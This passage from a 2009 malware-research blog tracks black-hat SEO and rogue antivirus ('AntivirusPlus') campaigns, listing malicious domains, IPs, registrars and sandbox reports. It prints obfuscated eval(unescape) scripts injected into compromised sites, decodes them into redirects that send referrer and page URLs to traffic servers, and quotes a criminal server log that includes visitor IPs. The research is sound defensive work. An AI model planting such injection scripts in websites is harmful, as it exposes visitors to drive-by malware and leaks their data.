/in.cgi?income8</td><td>Redirect to exploit<br /> hyperliteautoservices.cn/index.php (dead)<br /> but the trojan is still available on<br /> hyperliteautoservices.cn/load.php <br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a><br /> [94.247.3.151]</td></tr><tr><td>hxxp://playbetwager.cn/in.cgi?income</td><td><br /> freeonlinehostguide.com/index.php</td></tr><tr><td>hxxp://superbetfair.cn/in.cgi?income</td><td>Botnet C&C / Exploits to litehitscar.cn<br /> <a href="http://wepawet.iseclab.org/view.php?hash=75489e544a8735e0d72844529b276700&t=1239080309&type=js" target="_blank">Analysis</a><br /> then loads a trojan located at<br /> hyperliteautoservices.cn/load.php?id=4<br /><a href="http://www.virustotal.com/analisis/fb784b1a5c3fa2c71c03d7570fdec747">VirusTotal</a> - <a href="http://anubis.iseclab.org/?action=result&task_id=1e8af2fbea8c501d471711daf32ad9599" target="_blank">Anubis</a> - <a href="http://wepawet.iseclab.org/view.php?hash=9bad5a6b522a3a1a37b6a62572a83767&t=1239297891&type=js" target="_blank">Redirection Analysis</a><br />Detection: Trojan.Botnetlog.3 <br /></td></tr><tr><td>hxxp://thelotbet.cn</td><td> </td></tr><tr><td>hxxp://yourfilmmovie.cn</td><td>Botnet C&C</td></tr></table><br /><br />hxxp://freeonlinehostguide.com/index.php <a href="http://wepawet.cs.ucsb.edu/view.php?type=js&hash=5802a3beabd9368daf35ad1eb4a995b3&t=1238099033">Analysis</a><hr /><p>DNS<br /><br />AS48856<br />VENTREX-AS Ventrex LLP</p><p>95.129.144.210</p><p>AS34187<br />RENOME-AS Renome-Service: Joint Multimedia Cable Network Odessa, Ukraine</p><p>78.26.179.79</p></td></tr></table></td></tr></table></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-17945510995376722442009-04-07T06:19:00.000-07:002009-04-09T14:31:07.836-07:00Black Hat SEO and Rogue Antivirus p.7<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO - Rogue Antivirus is BIG Business</span><br /><br /> Inside the malicious traffic<br /><br /></p><table width="510" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="510"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p> Finjan's Malicious Code Research Center has published a nice report <br /> about the rogue antivirus business <br />(redirecting visitors from legitimate websites). 
<a href="http://news.cnet.com/8301-1009_3-10200104-83.html" target="_blank">Zdnet Article</a><br /><br />The article can be found in the latest <a href="http://www.finjan.com/cybercrime_intelligence" target="_blank">Cybercrime Intelligence Report</a>.<br /><hr />I just want to show some scripts added to legitimate websites and the log <br />we found on the criminal web server.<br /><br />Note that every domain mentioned on this blog, like goscanfuse.com, scan6lite.com <br />and scan7new.com, is listed in the Google "Safe Browsing" API, <br />and each listing reveals a lot of information, <br /> e.g. the number of (compromised) domains involved and the other domains used in conjunction with it.<br /><br /><hr /><br />We start with the Google Safe Browsing diagnostic for scanline6.com<br /><br /><a href="http://www.google.com/safebrowsing/diagnostic?site=http://scanline6.com/nag/1/&hl=en" target="_blank">Report here</a><br /><br /> Screenshot below (in case the report gets updated)<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGSs8mKUf4KusGfKv0Y4DKZUH938u9SypcbiwjaivINPVX8mu-k7SBFJtiQ06soez_Wp6lNSnq7xUUL2y2d7uLGdL16HshBXBODKjESWeZ-zKC8zkn-LmAunyuCVgIaNj0ii16bJVKoGon/s1600-h/AS21788NOC.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGSs8mKUf4KusGfKv0Y4DKZUH938u9SypcbiwjaivINPVX8mu-k7SBFJtiQ06soez_Wp6lNSnq7xUUL2y2d7uLGdL16HshBXBODKjESWeZ-zKC8zkn-LmAunyuCVgIaNj0ii16bJVKoGon/s320/AS21788NOC.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5321938534381381138" /></a><br /><br /> Now the Google Safe Browsing diagnostic for three compromised websites<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCBW3KC2zyn33C5AbWIfEd9YhLIV_DgHdYykTPIQQHNsb2OQ34UOE9lY3mkHgwLfwWb7R_5_EfWsVSL0Ytv4ibZGKdIPSTPeFUXdlVswplTB1b0MCO_d33ozytxqYc3FyknWsVJ1j3EraL/s1600-h/scanline6.comSafeBrowsing.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 199px;" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCBW3KC2zyn33C5AbWIfEd9YhLIV_DgHdYykTPIQQHNsb2OQ34UOE9lY3mkHgwLfwWb7R_5_EfWsVSL0Ytv4ibZGKdIPSTPeFUXdlVswplTB1b0MCO_d33ozytxqYc3FyknWsVJ1j3EraL/s320/scanline6.comSafeBrowsing.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5321938531281580738" /></a><br /><br /><br /></p><table width="280" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="276" height="46" style="padding:15px">alfredomcmillanji.awardspace.info<br /> members.lycos.co.uk/cvhkc8xhv/</td></tr></table><br />Malicious script inserted (after the body):<br /><br /><table width="511" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="507" height="61" style="padding:15px"><script><br />eval(unescape('\%64\%6F\%63\%75\%6D\%65\%6E\%74\%2E\%6C\<br />%6F\%63\%61\%74\%69\%6F\%6E\%3D\%22\%68\%74\%74\%70\%3A\%2F<br />\%2F\%6F\%6E\%6C\%79\%66\%69\%6E\%64\%2E\%6E\%65\%74\%2F\%69\<br />%6E\%2E\%63\%67\%69\%3F\%33\%26\%67\%72\%6F\%75\%70\%3D\%31\<br />%31\%26\%70\%61\%72\%61\%6D\%65\%74\%65\%72\%3D\%6F\%72\%74\<br />%68\%6F\%70\%65\%64\%69\%63\%2B\%70\%68\%79\%73\%69\%63\%61\<br />%6C\%2B\%65\%78\%61\%6D\%69\%6E\%61\%74\%69\%6F\%6E\%22\%3B'))<br /></script></td></tr></table><p>This forces the browser to redirect to a traffic management server:<br /></p><table width="372" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="368" height="61" style="padding:15px">document.location="http://onlyfind.net/in.cgi?3&group=11&<br />parameter=orthopedic+physical+examination";</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=6e3409b2529bbcfd9982b877495e14f2&t=1239107498&type=js" target="_blank">Result here</a><br /> It then redirects to a drive-by-download domain, which chooses the next redirection:<br /></p><table width="339" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="335" height="46" style="padding:15px">onlyfind.net to "goscandata.com" to 
"scanany6.com"</td></tr></table><br />Note: the drive-by-download domain redirects to a new site every day.<br /> <br />On April 6: scanany6.com - <a href="http://wepawet.iseclab.org/view.php?hash=6e3409b2529bbcfd9982b877495e14f2&t=1239107498&type=js" target="_blank">Redirection Analysis</a><br />On April 7: scan7live.com - <a href="http://wepawet.iseclab.org/view.php?hash=6277c30fcb40c1550e3b48cc6033b661&t=1239259541&type=js" target="_blank">Redirection Analysis</a><br />On April 8: google.com <br /> On April 9: lite6scan.com - <a href="http://wepawet.iseclab.org/view.php?hash=75b212b2737a3f1567a109552ef9358a&t=1239312379&type=js" target="_blank">Redirection Analysis</a><br /><br /><hr /><br />Let's look at the second domain:<br /><br /><table width="202" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="198" height="46" style="padding:15px">home.no/kjveubjh/</td></tr></table><br />Malicious script inserted (after the body):<br /><br /><table width="490" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="486" height="61" style="padding:15px"><script language="JavaScript"><br />eval(unescape('%70%61%72%65%6E%74%<br />2E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%<br />2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%3A%2F%<br />2F%64%64%6F%72%73%2E%69%6E%66%6F%2F%69%6E%2E%63%<br />67%69%3F%31%31%26%6B%65%79%77%6F%72%64%3D%67%61%<br />72%61%67%65%62%61%6E%64%2B%68%61%72%64%2B%72%6F%<br />63%6B%2B%67%75%69%74%61%72%2B%61%70%70%6C%65%2B%<br />6C%6F%6F%70%73%26%73%65%6F%72%65%66%3D%22%2B%65%<br />6E%63%6F%64%65%55%52%49%43%6F%6D%70%6F%6E%65%6E%<br />74%28%64%6F%63%75%6D%65%6E%74%2E%72%65%66%65%72%<br />72%65%72%29%2B%22%26%22%2B%22%70%61%72%61%6D%65%<br />74%65%72%3D%24%6B%65%79%77%6F%72%64%26%6B%65%79%<br />77%6F%72%64%3D%24%6B%65%79%77%6F%72%64%26%73%65%<br />3D%24%73%65%26%75%72%3D%31%26%48%54%54%50%5F%52%<br />45%46%45%52%45%52%3D%22%2B%65%6E%63%6F%64%65%55%<br />52%49%43%6F%6D%70%6F%6E%65%6E%74%28%64%6F%63%75%<br />6D%65%6E%74%2E%55%52%4C%29%29'))<br /></script></td></tr></table><p>This forces the browser to redirect to another traffic management server:<br /></p><table width="409" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="405" height="61" style="padding:15px">parent.window.location.replace("http://ddors.info/in.cgi?11&keyword=<br />garageband+hard+rock+guitar+apple+loops&seoref="<br />+encodeURIComponent(document.referrer)+"&"+<br />"parameter=$keyword&keyword=$keyword&se=$se&ur=1<br />&HTTP_REFERER="+encodeURIComponent(document.URL))</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=b5e1b4dfe085fd8dd08aaddd70cac93&t=1239112269&type=js" target="_blank">Result here</a><br /> It then redirects to a drive-by-download domain, which chooses the next redirection:<br /></p><table width="423" height="48" border="1" cellpadding="0" cellspacing="0"><tr><td width="419" height="46" style="padding:15px">ddors.info to "goscandata.com" to "scanany6.com"</td></tr></table><br />Note that during the redirection the "traffic management server" is informed of your IP <br />and of the site that served the redirection (the compromised website).<br /><br /> Interestingly, the site serving the first redirection has been cited in <a href="http://www.malwaredomainlist.com/mdl.php?search=ddors.info" target="_blank">Malware Domain List</a> <br /> since May 2008 for hosting a Zlob variant. 
<br /><br /> *******<br /><br /> What we found on the server:<br /><br /><table width="426" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="422" height="61" style="padding:15px">1 1 0 0 0 0 0 0 US en-us 65.55.165.94 http%3A%2F%2Ftiti%2Eiax%<br />2Ebe%2Fdiagnostic%2Dteaching%2Dof%2Dreading%2Dand%2Djour<br />nal%2Darticles%2Ehtml%3Ffeed%3Dcomments%2Drss2 articles live%<br />2Ecom Mozilla%2F4%2E0+%28compatible%3B+MSIE+6%2E0%3B+<br />Windows+NT+5%2E2%3B1 1 0 0 1 1 1 0 GB en-gb 86.147.111.244<br />http%3A%2F%2Fhome%2Eno%2Fchuka%2Fwicapeadea%2Ehtml<br />wickapeadea yahoo Mozilla%2F4%2E0+%28compatible%3B+<br />MSIE+7%2E0%3B+Windows+NT+5%2E1%3B1 1 0 0 1 1 1 0 US <br />en-us 72.11.87.126 http%3A%2F%2Ftiti%2Eiax%2Ebe%2Faia%<br />2Dbilling%2Dform%2Ehtml aia+billing+form msn Mozilla%2F4%2E0<br />+%28compatible%3B+MSIE+7%2E0%3B+Windows+NT+5%2E1%3B<br /></td></tr></table><p><br /> The fields are the visitor's IP (and country), browser version/language and the referring site, which is the compromised website.<br /><br /> I will not publish the entire log because a LOT of compromised websites are cited.<br /> (We also have logs from other servers, megabytes in size, which include thousands of compromised websites.) 
<br /><br /> Here are some of them:<br /></p><table width="409" height="63" border="1" cellpadding="0" cellspacing="0"><tr><td width="405" height="61" style="padding:15px">1 1 0 0 0 0 0 0 <br />US en-us 65.55.165.94 <br />hxxp://titi.iax.be/diagnostic-teaching-of-reading-and-journal-articles.html?feed=comments-rss2<br />Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2;) <br /><a href="http://wepawet.iseclab.org/view.php?hash=7b65f635713daef7ab6d96a4b1b5252f&t=1239112857&type=js" target="_blank">Redirection Analysis</a> <br /><br />1 1 0 0 1 1 1 0 <br />GB en-gb 86.147.111.244<br />hxxp://home.no/chuka/wicapeadea.html<br />Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)<br /><a href="http://wepawet.iseclab.org/view.php?hash=309ecbd6585d5312b71e000faff62ca0&t=1239115142&type=js" target="_blank">Redirection Analysis</a> <br /><br />1 1 0 0 1 1 1 0 <br />US en-us 72.11.87.126<br />hxxp://titi.iax.be/aia-billing-form.html<br />Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)<br /><a href="http://wepawet.iseclab.org/view.php?hash=68f7e099e33a29e4512ea455e73bfaf7&t=1239114945&type=js" target="_blank">Redirection Analysis</a><br /><br /> 4 1 1 0 0 0 0 0 <br />FR en-us 193.47.80.77<br />hxxp://mitglied.lycos.de/gbk6ntkbn/usda-maps-mn.html<br />keyword for traffic: usda maps mn<br /><a href="http://wepawet.iseclab.org/view.php?hash=c6c7901b91f89e3c7b0fce27acab32ac&t=1239114403&type=js" target="_blank">Redirection Analysis</a><br /><br /> 4 1 1 0 0 0 0 0 US <br /> en-us 204.62.53.124<br />hxxp://members.lycos.co.uk/dkd1nfkdf/voodoo-glow-skulls-guitar-tabs.html <br />keyword for traffic: voodoo glow skulls guitar tabs <br /><a href="http://wepawet.iseclab.org/view.php?hash=1b614f1201d8167c987ff2d4634276e2&t=1239114957&type=js" target="_blank">Redirection Analysis</a> <br /><br /> 4 1 0 0 0 0 0 0 IE <br /> en-us 78.137.163.133<br /> hxxp://usuarios.lycos.es/utrinopok/remove-hair-dye-stains.html <br /> keyword for traffic: remove hair dye stains <br /><a 
href="http://wepawet.iseclab.org/view.php?hash=c001a486d89b53856295b0ef12d59fd3&t=1239114967&type=js" target="_blank">Redirection Analysis</a> <br /><br />4 1 0 0 1 1 1 0 US <br />en-us 71.235.179.148 <br />hxxp://members.lycos.nl/eu40wyhk/presentation-tools-for-excel-highlighting.html <br />keyword for traffic: presentation tools for excel highlighting<br /><a href="http://wepawet.iseclab.org/view.php?hash=1b614f1201d8167c987ff2d4634276e2&t=1239114957&type=js" target="_blank">Redirection Analysis</a> <br /><br /></td></tr></table></td></tr><tr><td> </td></tr></table></td></tr></table></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-50240488283852173092009-04-04T23:02:00.000-07:002009-04-06T07:15:32.345-07:00Rogueware AntivirusPlus - thegreatsecurity.com<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="518" height="626" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr>
<td colspan="2" valign="top" height="561"><span style="font-size:14px; font-weight:bold">Rogueware AntivirusPlus - thegreatsecurity.com, todaybestscan.com</span><br /><br />Another list of malicious domains promoting rogue software associated with "AntivirusPlus".<br /><br /><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"> <tr> <td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus">THIS page</a> if you need more information<br /></td></tr></table><br /><hr /><span class="scam_website">easyincomeprotection.cn</span> (also has 6 different templates)<br /><br /><a href="http://anubis.iseclab.org/?action=result&task_id=190fc55b62d92d7e4c5f530e56ace2255&format=html">Anubis</a> - <a href="http://www.virustotal.com/analisis/3ad454086dcaf5b39567c1eda21943b5" 
target="_blank">VirusTotal</a> <br /><br /> Created 30-mar-2009 <br /><br /> Registered with "广东时代互联科技有限公司", which translated into English is:<br /><br />"Time Internet Technology Co., Ltd. Guangdong", also cited as registrar for SCAM websites here:<br /><br /><a href="http://www.bobbear.co.uk/DDK-Group-Inc.html" target="_blank">DDK-Group-Inc.</a><br /><a href="http://www.bobbear.co.uk/EFS-Capital-Group-Inc.html" target="_blank">EFS-Capital-Group-Inc</a><br /><a href="http://www.bobbear.co.uk/tdk-group-inc.html" target="_blank">tdk-group-inc</a> <br /><a href="http://www.bobbear.co.uk/e-innovative-inc.html" target="_blank">e-innovative-inc</a><br /><br />DNS: <br /><br /><span class="scam_website">ns1.pubilcnameserver7.com</span> [94.247.2.215]<br /><span class="scam_website">ns2.pubilcnameserver7.com</span> [94.247.2.216]<br /><br /> Using the same DNS we have:<br /> <br /> <span class="scam_website">easyaddedantivirus.com</span> [94.247.2.215]<br /> <span class="scam_website">yourcountedantivirus.com</span> [94.247.2.215]<br /><br />Created 30-mar-2009 <br /><br />Registrar used: BIZCN.COM, INC.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM28E7RcpWm4tCmLjj2RzEJRz_MavHEaSb_s1sstjSOCrIbEIfApc9HW_2XPiAXR6EyQ0FWTFSh3tSbV58M-BZeQ-CktYnr8zmmAz1oqt7svDp6e4mIANVN0521tNnAIoJau0Of5Vu9WSn/s1600-h/antivirus-plus-new.com.jpg"><img style="cursor:pointer; cursor:hand;width: 205px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM28E7RcpWm4tCmLjj2RzEJRz_MavHEaSb_s1sstjSOCrIbEIfApc9HW_2XPiAXR6EyQ0FWTFSh3tSbV58M-BZeQ-CktYnr8zmmAz1oqt7svDp6e4mIANVN0521tNnAIoJau0Of5Vu9WSn/s320/antivirus-plus-new.com.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_" /></a> <br /><br />Application screenshot (Alias: FakePlus)<br /><br /><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHWcKQIwtwBvti53XNPQIby7cbKR0XutupaoYNchy28IRcI_ZaqDXH4-yaMJpJclSrTskBflQZpMOJIxh8V2QHIRyxNuoAaJPDXVk95u6TJgYrpz4JAzfelslnuM505znTvjH7-Fsy6bJb/s1600-h/AntivirusPlusSetup2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHWcKQIwtwBvti53XNPQIby7cbKR0XutupaoYNchy28IRcI_ZaqDXH4-yaMJpJclSrTskBflQZpMOJIxh8V2QHIRyxNuoAaJPDXVk95u6TJgYrpz4JAzfelslnuM505znTvjH7-Fsy6bJb/s320/AntivirusPlusSetup2.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5321056722953046562" /></a><br /><br /><hr /><span class="scam_website">topsoftscanner.com</span> [209.44.126.14]<br /><br />Created 25-mar-2009<br /><br />No whois info - PrivacyProtect.org <br />Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD<br /><br /><span class="scam_website">thegreatsecurity.com</span> [209.44.126.14]<br /><br />hxxp://golkis.dnip.net/online-j49/yornt.html<br /><a href="http://wepawet.iseclab.org/view.php?hash=877ac4d842b4d77d426ff3b8eb93694d&t=1238846260&type=js" target="_blank">JavaScript Analysis</a> by Wepawet<br /><br />Seen on Alexa<br /> "The Google cache has been updated and the link has been removed."<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi32gdrbRFHzIXJDqN58oV_dyqfc2-pIG1ombrQH6KsGIPmaTV57vgp0JuJdwLy3Y9AhnTKkkhTiJake991xR796M62pFC5UQRYQlwVKsdeVnOURGy6YyABgO9x9_Zj33_uXaujw6cEudBB/s1600-h/thegreatsecurity.com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 44px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi32gdrbRFHzIXJDqN58oV_dyqfc2-pIG1ombrQH6KsGIPmaTV57vgp0JuJdwLy3Y9AhnTKkkhTiJake991xR796M62pFC5UQRYQlwVKsdeVnOURGy6YyABgO9x9_Zj33_uXaujw6cEudBB/s320/thegreatsecurity.com.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5320970804667840450" /></a><br /><br /> Created 03-apr-2009 <br /><br /> No whois info - PrivacyProtect.org <br />Registrar used: DIRECTI INTERNET SOLUTIONS PVT. 
LTD <br /><br /><span class="scam_website">checkonlinesecurity.com</span> [209.44.126.14]<br /><br />Created 05-apr-2009<br /><br />No whois info - PrivacyProtect.org <br />Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD <br /><br /><span class="scam_website">todaybestscan.com</span> [209.44.126.14]<br /><br />Created 05-apr-2009<br /><br />No whois info - PrivacyProtect.org <br />Registrar used: DIRECTI INTERNET SOLUTIONS PVT. LTD <br /><br /> Using these two DNS: <br /><br /><u>ns1.fuckmoneycash.com</u> [209.44.126.15]<br /><u>ns2.fuckmoneycash.com</u> [209.44.126.16] <br /><br /> Title: <i>My computer Online Scan</i><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE7qILWfFe3bbSB6g1cW5mU388TZ39gTs_VKfDlzqoLpkZcrybtyGnQDz0AUlHHYl9GgDjtnJEfcy_24KG2v-2T73X6guy6slOxUSHwICqn-4tfqXVPsYvMLI4kkSZwkwZRSiBFE6QUgSp/s1600-h/thegreatsecurity.com.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 250px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE7qILWfFe3bbSB6g1cW5mU388TZ39gTs_VKfDlzqoLpkZcrybtyGnQDz0AUlHHYl9GgDjtnJEfcy_24KG2v-2T73X6guy6slOxUSHwICqn-4tfqXVPsYvMLI4kkSZwkwZRSiBFE6QUgSp/s320/thegreatsecurity.com.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5320867043546382258" /></a><br /><br /><br /><br /><br /><br /></td></tr><tr> <td height="25" colspan="2" valign="top" style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19px;padding:7px;"><b>Template used:</b></td></tr><tr><td width="27" height="40"> </td><td width="491"><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsAmXE3LgtKf89Yrjy7zEpRNRaHup0WVg1XM9z6iA0XeI4aCZjfdBWzS5Wen7mWcR3n6qu1zhaC7XA918odaH2qvNwr7a0v11p9VM__JZ9z6UY943AcWiSc2QdNJr5uEBQBja8cQYQfBke/s1600-h/easyincomeprotection.cn-SCAM-AntivirusPlus-2.jpg"><img 
style="cursor:pointer; cursor:hand;width: 320px; height: 280px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsAmXE3LgtKf89Yrjy7zEpRNRaHup0WVg1XM9z6iA0XeI4aCZjfdBWzS5Wen7mWcR3n6qu1zhaC7XA918odaH2qvNwr7a0v11p9VM__JZ9z6UY943AcWiSc2QdNJr5uEBQBja8cQYQfBke/s320/easyincomeprotection.cn-SCAM-AntivirusPlus-2.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5321024863702689394" /></a> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxIZ5Cww3V2I_Lzg3uYYfsD7nAqeKE_8uBhdJk5IT8oadpnu12SHSlmRHn_AF5Evp3Y-jO2WMhxw4wJ8RPXOXDPoWehAeKwvoeQdBOw5nUKVW8GUqG2AcokumAyUInz5o2iw1QCSzW8iXn/s1600-h/easyincomeprotection.cn-SCAM-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 270px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxIZ5Cww3V2I_Lzg3uYYfsD7nAqeKE_8uBhdJk5IT8oadpnu12SHSlmRHn_AF5Evp3Y-jO2WMhxw4wJ8RPXOXDPoWehAeKwvoeQdBOw5nUKVW8GUqG2AcokumAyUInz5o2iw1QCSzW8iXn/s320/easyincomeprotection.cn-SCAM-AntivirusPlus.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5321024863888484722" /></a> <br /><a rel="dofollow" target="_blank" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjYzw8v0QHihmhfMVrmoguKyKu_ZN3IsfXrUkNKPltSAAuyi5LKrozS0WVocIFvfv1bf2xkRK0fDBstt3VGLjOtwoCzF2iQxvHlBKmz37d35z9SI2Z9Xg0Gt9IwYmPwnvLtTixLC2QC7e7/s1600-h/onlinewebscan1-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 276px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjYzw8v0QHihmhfMVrmoguKyKu_ZN3IsfXrUkNKPltSAAuyi5LKrozS0WVocIFvfv1bf2xkRK0fDBstt3VGLjOtwoCzF2iQxvHlBKmz37d35z9SI2Z9Xg0Gt9IwYmPwnvLtTixLC2QC7e7/s320/onlinewebscan1-AntivirusPlus.jpg" border="0" alt="Template AntivirusPlus from onlinescanweb.com" id="BLOGGER_PHOTO_ID_5313595059535344802" /></a><a rel="dofollow" target="_blank" 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoCVP87tvU_gaHKo72IQwWMeq1ViawWnkaMwcxExxH1XRvyJyOCBVUGp4Gv5gAxT83VRAyST0G6WfkEj1NqQ4wqK-84YzzdBlZ73LqPSrDQi1RbLdKdr8DeOj9q-Os0l3UeDd_wS3ymsXm/s1600-h/onlinewebscan-AntivirusPlus.jpg"><br /><img style="cursor:pointer; cursor:hand;width: 320px; height: 242px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoCVP87tvU_gaHKo72IQwWMeq1ViawWnkaMwcxExxH1XRvyJyOCBVUGp4Gv5gAxT83VRAyST0G6WfkEj1NqQ4wqK-84YzzdBlZ73LqPSrDQi1RbLdKdr8DeOj9q-Os0l3UeDd_wS3ymsXm/s320/onlinewebscan-AntivirusPlus.jpg" border="0" alt="Template AntivirusPlus from onlinescanweb.com" id="BLOGGER_PHOTO_ID_5313595700040726258" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg8VQqNL0sX3PNQ-APRwv44dmpM4sdiFImdnITmqv8UnNfGNicwrLBQWUe9wohLt-RKCcFoR2j7hurgfP-wMD7m8eXDIrM30TCEBJk6GQ_44kYOKcE-dsp0VchSHzTwKjXntK2AezTUkQn/s1600-h/onlinewebscan1-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 276px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjg8VQqNL0sX3PNQ-APRwv44dmpM4sdiFImdnITmqv8UnNfGNicwrLBQWUe9wohLt-RKCcFoR2j7hurgfP-wMD7m8eXDIrM30TCEBJk6GQ_44kYOKcE-dsp0VchSHzTwKjXntK2AezTUkQn/s320/onlinewebscan1-AntivirusPlus.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template 1" id="BLOGGER_PHOTO_ID_5313598311944071714" /></a> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj22Vw7OWvsHpmfqKw9GPr1DSXr1o-76QMXkrwO5xnGf_HtDvrDmd6n97t5ugV8eSJIkaqyXZh9oSFOIKsOs8pZZ9-wUJ8ZgWPZz1xpP8CyHpWCPMmkjMg0FAumDiqV7M90nE1v34J1FZWZ/s1600-h/onlinewebscan-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 242px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj22Vw7OWvsHpmfqKw9GPr1DSXr1o-76QMXkrwO5xnGf_HtDvrDmd6n97t5ugV8eSJIkaqyXZh9oSFOIKsOs8pZZ9-wUJ8ZgWPZz1xpP8CyHpWCPMmkjMg0FAumDiqV7M90nE1v34J1FZWZ/s320/onlinewebscan-AntivirusPlus.jpg" border="0" alt="onlinewebscan.com AntivirusPlus Template 1 
bis"id="BLOGGER_PHOTO_ID_5313598312165816114" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie79R50CipEG7_cQAONvL39tsMM2TMCLZgfFQUdk-uoRgj5cgHFjgszFUDu34Itakx9jM-WYoj7I9h5TsnBsquwEi5GRwWzdlXWrtVFIT4HdHeAhQ9UapOS3IQkJA_dtq7U1T0uRSxUdhY/s1600-h/onlinescanweb.com-intro-RapidAntivirus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 282px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie79R50CipEG7_cQAONvL39tsMM2TMCLZgfFQUdk-uoRgj5cgHFjgszFUDu34Itakx9jM-WYoj7I9h5TsnBsquwEi5GRwWzdlXWrtVFIT4HdHeAhQ9UapOS3IQkJA_dtq7U1T0uRSxUdhY/s320/onlinescanweb.com-intro-RapidAntivirus.jpg" border="0" alt="onlinewebscan.com RapidAntivirus Template 1"id="BLOGGER_PHOTO_ID_5313599119170794226" /></a><a 